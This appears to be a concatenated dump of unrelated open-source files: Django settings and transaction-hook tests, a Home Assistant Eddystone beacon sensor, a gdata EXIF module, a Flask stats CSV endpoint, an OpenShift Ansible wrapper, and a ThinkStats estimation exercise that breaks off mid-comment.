# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES = [
{
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
'DIRS': [
str(APPS_DIR.path('templates')),
],
'OPTIONS': {
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
'debug': DEBUG,
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
# https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
],
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
# Your stuff: custom template context processors go here
],
},
},
]
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# STATIC FILE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR('staticfiles'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
str(APPS_DIR.path('static')),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# MEDIA CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(APPS_DIR('media'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# URL Configuration
# ------------------------------------------------------------------------------
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
# AUTHENTICATION CONFIGURATION
# ------------------------------------------------------------------------------
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = 'username'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
# Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = 'users.User'
LOGIN_REDIRECT_URL = 'users:redirect'
LOGIN_URL = 'account_login'
# SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = 'slugify.slugify'
# LOGGING CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
{% if cookiecutter.use_celery == "y" %}
########## CELERY
INSTALLED_APPS += ('{{cookiecutter.repo_name}}.taskapp.celery.CeleryConfig',)
# if you are not using the django database broker (e.g. rabbitmq, redis, memcached), you can remove the next line.
INSTALLED_APPS += ('kombu.transport.django',)
BROKER_URL = env("CELERY_BROKER_URL", default='django://')
########## END CELERY
{% endif %}
# Your common stuff: Below this line define 3rd party library settings
| bsd-3-clause |
qedi-r/home-assistant | homeassistant/components/eddystone_temperature/sensor.py | 2 | 5793 | """
Read temperature information from Eddystone beacons.
Your beacons must be configured to transmit UID (for identification) and TLM
(for temperature) frames.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.eddystone_temperature/
"""
import logging
# pylint: disable=import-error
from beacontools import (
BeaconScanner,
EddystoneFilter,
EddystoneTLMFrame,
)
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_NAME,
EVENT_HOMEASSISTANT_START,
EVENT_HOMEASSISTANT_STOP,
STATE_UNKNOWN,
TEMP_CELSIUS,
)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
CONF_BEACONS = "beacons"
CONF_BT_DEVICE_ID = "bt_device_id"
CONF_INSTANCE = "instance"
CONF_NAMESPACE = "namespace"
BEACON_SCHEMA = vol.Schema(
{
vol.Required(CONF_NAMESPACE): cv.string,
vol.Required(CONF_INSTANCE): cv.string,
vol.Optional(CONF_NAME): cv.string,
}
)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_BT_DEVICE_ID, default=0): cv.positive_int,
vol.Required(CONF_BEACONS): vol.Schema({cv.string: BEACON_SCHEMA}),
}
)
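# For illustration, a matching configuration.yaml entry might look like
# this (all values are placeholders; namespace is 20 hex characters,
# instance is 12, per get_from_conf below):
#
# sensor:
# - platform: eddystone_temperature
# bt_device_id: 0
# beacons:
# living_room:
# namespace: "112233445566778899aa"
# instance: "000000000001"
# name: "Living Room"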
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Validate configuration, create devices and start monitoring thread."""
bt_device_id = config.get("bt_device_id")
beacons = config.get(CONF_BEACONS)
devices = []
for dev_name, properties in beacons.items():
namespace = get_from_conf(properties, CONF_NAMESPACE, 20)
instance = get_from_conf(properties, CONF_INSTANCE, 12)
name = properties.get(CONF_NAME, dev_name)
if instance is None or namespace is None:
_LOGGER.error("Skipping %s", dev_name)
continue
devices.append(EddystoneTemp(name, namespace, instance))
if devices:
mon = Monitor(hass, devices, bt_device_id)
def monitor_stop(_service_or_event):
"""Stop the monitor thread."""
_LOGGER.info("Stopping scanner for Eddystone beacons")
mon.stop()
def monitor_start(_service_or_event):
"""Start the monitor thread."""
_LOGGER.info("Starting scanner for Eddystone beacons")
mon.start()
add_entities(devices)
mon.start()
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, monitor_stop)
hass.bus.listen_once(EVENT_HOMEASSISTANT_START, monitor_start)
else:
_LOGGER.warning("No devices were added")
def get_from_conf(config, config_key, length):
"""Retrieve value from config and validate length."""
string = config.get(config_key)
if len(string) != length:
_LOGGER.error(
"Error in config parameter %s: Must be exactly %d "
"bytes. Device will not be added",
config_key,
length / 2,
)
return None
return string
class EddystoneTemp(Entity):
"""Representation of a temperature sensor."""
def __init__(self, name, namespace, instance):
"""Initialize a sensor."""
self._name = name
self.namespace = namespace
self.instance = instance
self.bt_addr = None
self.temperature = STATE_UNKNOWN
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the device."""
return self.temperature
@property
def unit_of_measurement(self):
"""Return the unit the value is expressed in."""
return TEMP_CELSIUS
@property
def should_poll(self):
"""Return the polling state."""
return False
class Monitor:
"""Continuously scan for BLE advertisements."""
def __init__(self, hass, devices, bt_device_id):
"""Construct interface object."""
self.hass = hass
# List of beacons to monitor
self.devices = devices
# Number of the bt device (hciX)
self.bt_device_id = bt_device_id
def callback(bt_addr, _, packet, additional_info):
"""Handle new packets."""
self.process_packet(
additional_info["namespace"],
additional_info["instance"],
packet.temperature,
)
device_filters = [EddystoneFilter(d.namespace, d.instance) for d in devices]
self.scanner = BeaconScanner(
callback, bt_device_id, device_filters, EddystoneTLMFrame
)
self.scanning = False
def start(self):
"""Continuously scan for BLE advertisements."""
if not self.scanning:
self.scanner.start()
self.scanning = True
else:
_LOGGER.debug("start() called, but scanner is already running")
def process_packet(self, namespace, instance, temperature):
"""Assign temperature to device."""
_LOGGER.debug(
"Received temperature for <%s,%s>: %d", namespace, instance, temperature
)
for dev in self.devices:
if dev.namespace == namespace and dev.instance == instance:
if dev.temperature != temperature:
dev.temperature = temperature
dev.schedule_update_ha_state()
def stop(self):
"""Signal runner to stop and join thread."""
if self.scanning:
_LOGGER.debug("Stopping...")
self.scanner.stop()
_LOGGER.debug("Stopped")
self.scanning = False
else:
_LOGGER.debug("stop() called but scanner was not running")
| apache-2.0 |
blighj/django | tests/transaction_hooks/tests.py | 64 | 6900 | from django.db import connection, transaction
from django.test import TransactionTestCase, skipUnlessDBFeature
from .models import Thing
class ForcedError(Exception):
pass
class TestConnectionOnCommit(TransactionTestCase):
"""
Tests for transaction.on_commit().
    Creation and checking of database objects run in parallel with callback
    tracking to verify that the two behaviors match in all tested cases.
"""
available_apps = ['transaction_hooks']
def setUp(self):
self.notified = []
def notify(self, id_):
if id_ == 'error':
raise ForcedError()
self.notified.append(id_)
def do(self, num):
"""Create a Thing instance and notify about it."""
Thing.objects.create(num=num)
transaction.on_commit(lambda: self.notify(num))
def assertDone(self, nums):
self.assertNotified(nums)
self.assertEqual(sorted(t.num for t in Thing.objects.all()), sorted(nums))
def assertNotified(self, nums):
self.assertEqual(self.notified, nums)
def test_executes_immediately_if_no_transaction(self):
self.do(1)
self.assertDone([1])
def test_delays_execution_until_after_transaction_commit(self):
with transaction.atomic():
self.do(1)
self.assertNotified([])
self.assertDone([1])
def test_does_not_execute_if_transaction_rolled_back(self):
try:
with transaction.atomic():
self.do(1)
raise ForcedError()
except ForcedError:
pass
self.assertDone([])
def test_executes_only_after_final_transaction_committed(self):
with transaction.atomic():
with transaction.atomic():
self.do(1)
self.assertNotified([])
self.assertNotified([])
self.assertDone([1])
def test_discards_hooks_from_rolled_back_savepoint(self):
with transaction.atomic():
# one successful savepoint
with transaction.atomic():
self.do(1)
# one failed savepoint
try:
with transaction.atomic():
self.do(2)
raise ForcedError()
except ForcedError:
pass
# another successful savepoint
with transaction.atomic():
self.do(3)
# only hooks registered during successful savepoints execute
self.assertDone([1, 3])
def test_no_hooks_run_from_failed_transaction(self):
"""If outer transaction fails, no hooks from within it run."""
try:
with transaction.atomic():
with transaction.atomic():
self.do(1)
raise ForcedError()
except ForcedError:
pass
self.assertDone([])
def test_inner_savepoint_rolled_back_with_outer(self):
with transaction.atomic():
try:
with transaction.atomic():
with transaction.atomic():
self.do(1)
raise ForcedError()
except ForcedError:
pass
self.do(2)
self.assertDone([2])
def test_no_savepoints_atomic_merged_with_outer(self):
with transaction.atomic():
with transaction.atomic():
self.do(1)
try:
with transaction.atomic(savepoint=False):
raise ForcedError()
except ForcedError:
pass
self.assertDone([])
def test_inner_savepoint_does_not_affect_outer(self):
with transaction.atomic():
with transaction.atomic():
self.do(1)
try:
with transaction.atomic():
raise ForcedError()
except ForcedError:
pass
self.assertDone([1])
def test_runs_hooks_in_order_registered(self):
with transaction.atomic():
self.do(1)
with transaction.atomic():
self.do(2)
self.do(3)
self.assertDone([1, 2, 3])
def test_hooks_cleared_after_successful_commit(self):
with transaction.atomic():
self.do(1)
with transaction.atomic():
self.do(2)
self.assertDone([1, 2]) # not [1, 1, 2]
def test_hooks_cleared_after_rollback(self):
try:
with transaction.atomic():
self.do(1)
raise ForcedError()
except ForcedError:
pass
with transaction.atomic():
self.do(2)
self.assertDone([2])
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_hooks_cleared_on_reconnect(self):
with transaction.atomic():
self.do(1)
connection.close()
connection.connect()
with transaction.atomic():
self.do(2)
self.assertDone([2])
def test_error_in_hook_doesnt_prevent_clearing_hooks(self):
try:
with transaction.atomic():
transaction.on_commit(lambda: self.notify('error'))
except ForcedError:
pass
with transaction.atomic():
self.do(1)
self.assertDone([1])
def test_db_query_in_hook(self):
with transaction.atomic():
Thing.objects.create(num=1)
transaction.on_commit(
lambda: [self.notify(t.num) for t in Thing.objects.all()]
)
self.assertDone([1])
def test_transaction_in_hook(self):
def on_commit():
with transaction.atomic():
t = Thing.objects.create(num=1)
self.notify(t.num)
with transaction.atomic():
transaction.on_commit(on_commit)
self.assertDone([1])
def test_hook_in_hook(self):
def on_commit(i, add_hook):
with transaction.atomic():
if add_hook:
transaction.on_commit(lambda: on_commit(i + 10, False))
t = Thing.objects.create(num=i)
self.notify(t.num)
with transaction.atomic():
transaction.on_commit(lambda: on_commit(1, True))
transaction.on_commit(lambda: on_commit(2, True))
self.assertDone([1, 11, 2, 12])
def test_raises_exception_non_autocommit_mode(self):
def should_never_be_called():
raise AssertionError('this function should never be called')
try:
connection.set_autocommit(False)
with self.assertRaises(transaction.TransactionManagementError):
transaction.on_commit(should_never_be_called)
finally:
connection.set_autocommit(True)
| bsd-3-clause |
Immortalin/python-for-android | python-build/python-libs/gdata/build/lib/gdata/exif/__init__.py | 253 | 6981 | # -*-*- encoding: utf-8 -*-*-
#
# This is gdata.photos.exif, implementing the exif namespace in gdata
#
# $Id: __init__.py 81 2007-10-03 14:41:42Z havard.gulldahl $
#
# Copyright 2007 Håvard Gulldahl
# Portions copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module maps elements from the {EXIF} namespace[1] to GData objects.
These elements describe image data, using exif attributes[2].
Picasa Web Albums uses the exif namespace to represent Exif data encoded
in a photo [3].
Picasa Web Albums uses the following exif elements:
exif:distance
exif:exposure
exif:flash
exif:focallength
exif:fstop
exif:imageUniqueID
exif:iso
exif:make
exif:model
exif:tags
exif:time
[1]: http://schemas.google.com/photos/exif/2007.
[2]: http://en.wikipedia.org/wiki/Exif
[3]: http://code.google.com/apis/picasaweb/reference.html#exif_reference
"""
__author__ = u'havard@gulldahl.no'# (Håvard Gulldahl)' #BUG: pydoc chokes on non-ascii chars in __author__
__license__ = 'Apache License v2'
import atom
import gdata
EXIF_NAMESPACE = 'http://schemas.google.com/photos/exif/2007'
class ExifBaseElement(atom.AtomBase):
"""Base class for elements in the EXIF_NAMESPACE (%s). To add new elements, you only need to add the element tag name to self._tag
""" % EXIF_NAMESPACE
_tag = ''
_namespace = EXIF_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
def __init__(self, name=None, extension_elements=None,
extension_attributes=None, text=None):
self.name = name
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
class Distance(ExifBaseElement):
"(float) The distance to the subject, e.g. 0.0"
_tag = 'distance'
def DistanceFromString(xml_string):
return atom.CreateClassFromXMLString(Distance, xml_string)
class Exposure(ExifBaseElement):
"(float) The exposure time used, e.g. 0.025 or 8.0E4"
_tag = 'exposure'
def ExposureFromString(xml_string):
return atom.CreateClassFromXMLString(Exposure, xml_string)
class Flash(ExifBaseElement):
"""(string) Boolean value indicating whether the flash was used.
  The .text attribute will either be `true' or `false'.
  As a convenience, instances support boolean conversion via __bool__,
  so for a Flash instance you can say:
  flash_used = bool(flash)
"""
_tag = 'flash'
  def __bool__(self):
    # Always return a bool; any text other than 'true' counts as False.
    return self.text is not None and self.text.lower() == 'true'
def FlashFromString(xml_string):
return atom.CreateClassFromXMLString(Flash, xml_string)
class Focallength(ExifBaseElement):
"(float) The focal length used, e.g. 23.7"
_tag = 'focallength'
def FocallengthFromString(xml_string):
return atom.CreateClassFromXMLString(Focallength, xml_string)
class Fstop(ExifBaseElement):
"(float) The fstop value used, e.g. 5.0"
_tag = 'fstop'
def FstopFromString(xml_string):
return atom.CreateClassFromXMLString(Fstop, xml_string)
class ImageUniqueID(ExifBaseElement):
"(string) The unique image ID for the photo. Generated by Google Photo servers"
_tag = 'imageUniqueID'
def ImageUniqueIDFromString(xml_string):
return atom.CreateClassFromXMLString(ImageUniqueID, xml_string)
class Iso(ExifBaseElement):
"(int) The iso equivalent value used, e.g. 200"
_tag = 'iso'
def IsoFromString(xml_string):
return atom.CreateClassFromXMLString(Iso, xml_string)
class Make(ExifBaseElement):
"(string) The make of the camera used, e.g. Fictitious Camera Company"
_tag = 'make'
def MakeFromString(xml_string):
return atom.CreateClassFromXMLString(Make, xml_string)
class Model(ExifBaseElement):
"(string) The model of the camera used,e.g AMAZING-100D"
_tag = 'model'
def ModelFromString(xml_string):
return atom.CreateClassFromXMLString(Model, xml_string)
class Time(ExifBaseElement):
"""(int) The date/time the photo was taken, e.g. 1180294337000.
Represented as the number of milliseconds since January 1st, 1970.
The value of this element will always be identical to the value
of the <gphoto:timestamp>.
Look at this object's .isoformat() for a human friendly datetime string:
photo_epoch = Time.text # 1180294337000
photo_isostring = Time.isoformat() # '2007-05-27T19:32:17.000Z'
Alternatively:
photo_datetime = Time.datetime() # (requires python >= 2.3)
"""
_tag = 'time'
def isoformat(self):
"""(string) Return the timestamp as a ISO 8601 formatted string,
e.g. '2007-05-27T19:32:17.000Z'
"""
import time
epoch = float(self.text)/1000
return time.strftime('%Y-%m-%dT%H:%M:%S.000Z', time.gmtime(epoch))
def datetime(self):
"""(datetime.datetime) Return the timestamp as a datetime.datetime object
Requires python 2.3
"""
import datetime
epoch = float(self.text)/1000
return datetime.datetime.fromtimestamp(epoch)
def TimeFromString(xml_string):
return atom.CreateClassFromXMLString(Time, xml_string)
class Tags(ExifBaseElement):
"""The container for all exif elements.
The <exif:tags> element can appear as a child of a photo entry.
"""
_tag = 'tags'
_children = atom.AtomBase._children.copy()
_children['{%s}fstop' % EXIF_NAMESPACE] = ('fstop', Fstop)
_children['{%s}make' % EXIF_NAMESPACE] = ('make', Make)
_children['{%s}model' % EXIF_NAMESPACE] = ('model', Model)
_children['{%s}distance' % EXIF_NAMESPACE] = ('distance', Distance)
_children['{%s}exposure' % EXIF_NAMESPACE] = ('exposure', Exposure)
_children['{%s}flash' % EXIF_NAMESPACE] = ('flash', Flash)
_children['{%s}focallength' % EXIF_NAMESPACE] = ('focallength', Focallength)
_children['{%s}iso' % EXIF_NAMESPACE] = ('iso', Iso)
_children['{%s}time' % EXIF_NAMESPACE] = ('time', Time)
_children['{%s}imageUniqueID' % EXIF_NAMESPACE] = ('imageUniqueID', ImageUniqueID)
def __init__(self, extension_elements=None, extension_attributes=None, text=None):
ExifBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.fstop=None
self.make=None
self.model=None
self.distance=None
self.exposure=None
self.flash=None
self.focallength=None
self.iso=None
self.time=None
self.imageUniqueID=None
def TagsFromString(xml_string):
return atom.CreateClassFromXMLString(Tags, xml_string)
| apache-2.0 |
urdh/streck | streck/controller/stats.py | 1 | 1319 | # -*- coding: utf-8 -*-
from collections import deque
from streck import app
from streck.models.stats import *
from streck.models.product import *
from flask import render_template, Response, stream_with_context
@app.route('/stats')
def stats():
return render_template('stats.html', stats=Stats, categories=Product.categories())
@app.route('/stats/timeseries.csv')
def csvseries():
def generate():
series = Stats.timeseries()
categories = []
categoryhistory = []
data = {}
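        # Each category keeps a deque of its last seven daily sums, used
        # below to emit a 7-day moving average ("Glidmedel" in the header).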
for row in series:
if not row[1] in categories:
categories.append(row[1])
categoryhistory.append(deque([0.0] * 7))
for row in series:
if not row[0] in data.keys():
        data[row[0]] = [0.0] * (len(categories) * 2 + 1)
idx = categories.index(row[1])
data[row[0]][idx] = row[2]
yield 'Datum,%s,%s,Glidmedel summa\n' % (','.join(categories), ','.join(['Glidmedel ' + c for c in categories]))
for date in sorted(data.iterkeys()):
for idx, cat in enumerate(categories):
categoryhistory[idx].popleft()
categoryhistory[idx].append(data[date][idx])
data[date][2 + idx] = sum(categoryhistory[idx]) / 7
data[date][4] = data[date][2] + data[date][3]
yield '%s,%s\n' % (date, ','.join(['%10.3f' % s for s in data[date]]))
return Response(stream_with_context(generate()), mimetype='text/csv')
| isc |
EricMountain-1A/openshift-ansible | roles/lib_openshift/src/class/oc_obj.py | 16 | 7575 | # pylint: skip-file
# flake8: noqa
# pylint: disable=too-many-instance-attributes
class OCObject(OpenShiftCLI):
''' Class to wrap the oc command line tools '''
# pylint allows 5. we need 6
# pylint: disable=too-many-arguments
def __init__(self,
kind,
namespace,
name=None,
selector=None,
kubeconfig='/etc/origin/master/admin.kubeconfig',
verbose=False,
all_namespaces=False):
''' Constructor for OpenshiftOC '''
super(OCObject, self).__init__(namespace, kubeconfig=kubeconfig, verbose=verbose,
all_namespaces=all_namespaces)
self.kind = kind
self.name = name
self.selector = selector
def get(self):
'''return a kind by name '''
results = self._get(self.kind, name=self.name, selector=self.selector)
if (results['returncode'] != 0 and 'stderr' in results and
'\"{}\" not found'.format(self.name) in results['stderr']):
results['returncode'] = 0
return results
def delete(self):
'''delete the object'''
results = self._delete(self.kind, name=self.name, selector=self.selector)
if (results['returncode'] != 0 and 'stderr' in results and
'\"{}\" not found'.format(self.name) in results['stderr']):
results['returncode'] = 0
return results
def create(self, files=None, content=None):
'''
Create a config
        NOTE: This creates the first file OR the first content.
TODO: Handle all files and content passed in
'''
if files:
return self._create(files[0])
# pylint: disable=no-member
# The purpose of this change is twofold:
# - we need a check to only use the ruamel specific dumper if ruamel is loaded
# - the dumper or the flow style change is needed so openshift is able to parse
# the resulting yaml, at least until gopkg.in/yaml.v2 is updated
if hasattr(yaml, 'RoundTripDumper'):
content['data'] = yaml.dump(content['data'], Dumper=yaml.RoundTripDumper)
else:
content['data'] = yaml.safe_dump(content['data'], default_flow_style=False)
content_file = Utils.create_tmp_files_from_contents(content)[0]
return self._create(content_file['path'])
# pylint: disable=too-many-function-args
def update(self, files=None, content=None, force=False):
'''update a current openshift object
        This receives a list of file names or content;
        it takes the first entry and calls replace on it.
TODO: take an entire list
'''
if files:
return self._replace(files[0], force)
if content and 'data' in content:
content = content['data']
return self.update_content(content, force)
def update_content(self, content, force=False):
'''update an object through using the content param'''
return self._replace_content(self.kind, self.name, content, force=force)
def needs_update(self, files=None, content=None, content_type='yaml'):
''' check to see if we need to update '''
objects = self.get()
if objects['returncode'] != 0:
return objects
data = None
if files:
data = Utils.get_resource_file(files[0], content_type)
elif content and 'data' in content:
data = content['data']
else:
data = content
# if equal then no need. So not equal is True
return not Utils.check_def_equal(data, objects['results'][0], skip_keys=None, debug=False)
# pylint: disable=too-many-return-statements,too-many-branches
@staticmethod
def run_ansible(params, check_mode=False):
'''perform the ansible idempotent code'''
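        # State handling summary: 'list' returns the query result as-is,
        # 'absent' deletes the object if it exists, and 'present' creates
        # the object when missing or replaces it when the definitions differ.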
ocobj = OCObject(params['kind'],
params['namespace'],
params['name'],
params['selector'],
kubeconfig=params['kubeconfig'],
verbose=params['debug'],
all_namespaces=params['all_namespaces'])
state = params['state']
api_rval = ocobj.get()
#####
# Get
#####
if state == 'list':
return {'changed': False, 'results': api_rval, 'state': state}
########
# Delete
########
if state == 'absent':
# verify its not in our results
if (params['name'] is not None or params['selector'] is not None) and \
(len(api_rval['results']) == 0 or \
('items' in api_rval['results'][0] and len(api_rval['results'][0]['items']) == 0)):
return {'changed': False, 'state': state}
if check_mode:
return {'changed': True, 'msg': 'CHECK_MODE: Would have performed a delete'}
api_rval = ocobj.delete()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
return {'changed': True, 'results': api_rval, 'state': state}
# create/update: Must define a name beyond this point
if not params['name']:
return {'failed': True, 'msg': 'Please specify a name when state is present.'}
if state == 'present':
########
# Create
########
if not Utils.exists(api_rval['results'], params['name']):
if check_mode:
return {'changed': True, 'msg': 'CHECK_MODE: Would have performed a create'}
# Create it here
api_rval = ocobj.create(params['files'], params['content'])
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
# return the created object
api_rval = ocobj.get()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
# Remove files
if params['files'] and params['delete_after']:
Utils.cleanup(params['files'])
return {'changed': True, 'results': api_rval, 'state': state}
########
# Update
########
# if a file path is passed, use it.
update = ocobj.needs_update(params['files'], params['content'])
if not isinstance(update, bool):
return {'failed': True, 'msg': update}
# No changes
if not update:
if params['files'] and params['delete_after']:
Utils.cleanup(params['files'])
return {'changed': False, 'results': api_rval['results'][0], 'state': state}
if check_mode:
return {'changed': True, 'msg': 'CHECK_MODE: Would have performed an update.'}
api_rval = ocobj.update(params['files'],
params['content'],
params['force'])
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
# return the created object
api_rval = ocobj.get()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
return {'changed': True, 'results': api_rval, 'state': state}
| apache-2.0 |
juoceano/ThinkStats2 | code/chap08soln.py | 65 | 6172 | """This file contains code used in "Think Stats",
by Allen B. Downey, available from greenteapress.com
Copyright 2014 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
from __future__ import print_function
import thinkstats2
import thinkplot
import math
import random
import numpy as np
from scipy import stats
from estimation import RMSE, MeanError
"""This file contains a solution to exercises in Think Stats:
Exercise 8.1
In this chapter we used $\xbar$ and median to estimate $\mu$, and
found that $\xbar$ yields lower MSE.
Also, we used $S^2$ and $S_{n-1}^2$ to estimate $\sigma$, and found that
$S^2$ is biased and $S_{n-1}^2$ unbiased.
Run similar experiments to see if $\xbar$ and median are biased estimates
of $\mu$.
Also check whether $S^2$ or $S_{n-1}^2$ yields a lower MSE.
My conclusions:
1) xbar and median yield lower mean error as m increases, so neither
one is obviously biased, as far as we can tell from the experiment.
2) The biased estimator of variance yields lower RMSE than the unbiased
estimator, by about 10%. And the difference holds up as m increases.
Exercise 8.2
Suppose you draw a sample with size $n=10$ from a population
with an exponential distribution with $\lambda=2$. Simulate
this experiment 1000 times and plot the sampling distribution of
the estimate $\lamhat$. Compute the standard error of the estimate
and the 90\% confidence interval.
Repeat the experiment with a few different values of $n$ and make
a plot of standard error versus $n$.
1) With sample size 10:
standard error 0.896717911545
confidence interval (1.2901330772324622, 3.8692334892427911)
2) As sample size increases, standard error and the width of
the CI decrease:
10 0.90 (1.3, 3.9)
100 0.21 (1.7, 2.4)
1000 0.06 (1.9, 2.1)
All three confidence intervals contain the actual value, 2.
Exercise 8.3
In games like hockey and soccer, the time between goals is
roughly exponential. So you could estimate a team's goal-scoring rate
by observing the number of goals they score in a game. This
estimation process is a little different from sampling the time
between goals, so let's see how it works.
Write a function that takes a goal-scoring rate, {\tt lam}, in goals
per game, and simulates a game by generating the time between goals
until the total time exceeds 1 game, then returns the number of goals
scored.
Write another function that simulates many games, stores the
estimates of {\tt lam}, then computes their mean error and RMSE.
Is this way of making an estimate biased? Plot the sampling
distribution of the estimates and the 90\% confidence interval. What
is the standard error? What happens to sampling error for increasing
values of {\tt lam}?
My conclusions:
1) RMSE for this way of estimating lambda is 1.4
2) The mean error is small and decreases with m, so this estimator
appears to be unbiased.
One note: If the time between goals is exponential, the distribution
of goals scored in a game is Poisson.
See https://en.wikipedia.org/wiki/Poisson_distribution
"""
def Estimate1(n=7, m=100000):
"""Mean error for xbar and median as estimators of population mean.
n: sample size
m: number of iterations
"""
mu = 0
sigma = 1
means = []
medians = []
for _ in range(m):
xs = [random.gauss(mu, sigma) for i in range(n)]
xbar = np.mean(xs)
median = np.median(xs)
means.append(xbar)
medians.append(median)
print('Experiment 1')
print('mean error xbar', MeanError(means, mu))
print('mean error median', MeanError(medians, mu))
def Estimate2(n=7, m=100000):
"""RMSE for biased and unbiased estimators of population variance.
n: sample size
m: number of iterations
"""
mu = 0
sigma = 1
estimates1 = []
estimates2 = []
for _ in range(m):
xs = [random.gauss(mu, sigma) for i in range(n)]
biased = np.var(xs)
unbiased = np.var(xs, ddof=1)
estimates1.append(biased)
estimates2.append(unbiased)
print('Experiment 2')
print('RMSE biased', RMSE(estimates1, sigma**2))
print('RMSE unbiased', RMSE(estimates2, sigma**2))
def SimulateSample(lam=2, n=10, m=1000):
"""Sampling distribution of L as an estimator of exponential parameter.
lam: parameter of an exponential distribution
n: sample size
m: number of iterations
"""
def VertLine(x, y=1):
thinkplot.Plot([x, x], [0, y], color='0.8', linewidth=3)
estimates = []
for j in range(m):
xs = np.random.exponential(1.0/lam, n)
lamhat = 1.0 / np.mean(xs)
estimates.append(lamhat)
stderr = RMSE(estimates, lam)
print('standard error', stderr)
cdf = thinkstats2.Cdf(estimates)
ci = cdf.Percentile(5), cdf.Percentile(95)
print('confidence interval', ci)
VertLine(ci[0])
VertLine(ci[1])
# plot the CDF
thinkplot.Cdf(cdf)
thinkplot.Save(root='estimation2',
xlabel='estimate',
ylabel='CDF',
title='Sampling distribution')
return stderr
def SimulateGame(lam):
"""Simulates a game and returns the estimated goal-scoring rate.
lam: actual goal scoring rate in goals per game
"""
goals = 0
t = 0
while True:
time_between_goals = random.expovariate(lam)
t += time_between_goals
if t > 1:
break
goals += 1
# estimated goal-scoring rate is the actual number of goals scored
L = goals
return L
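# Sketch (not part of the original exercises): if the time between goals is
# exponential with rate lam, the goals per game from SimulateGame(lam) are
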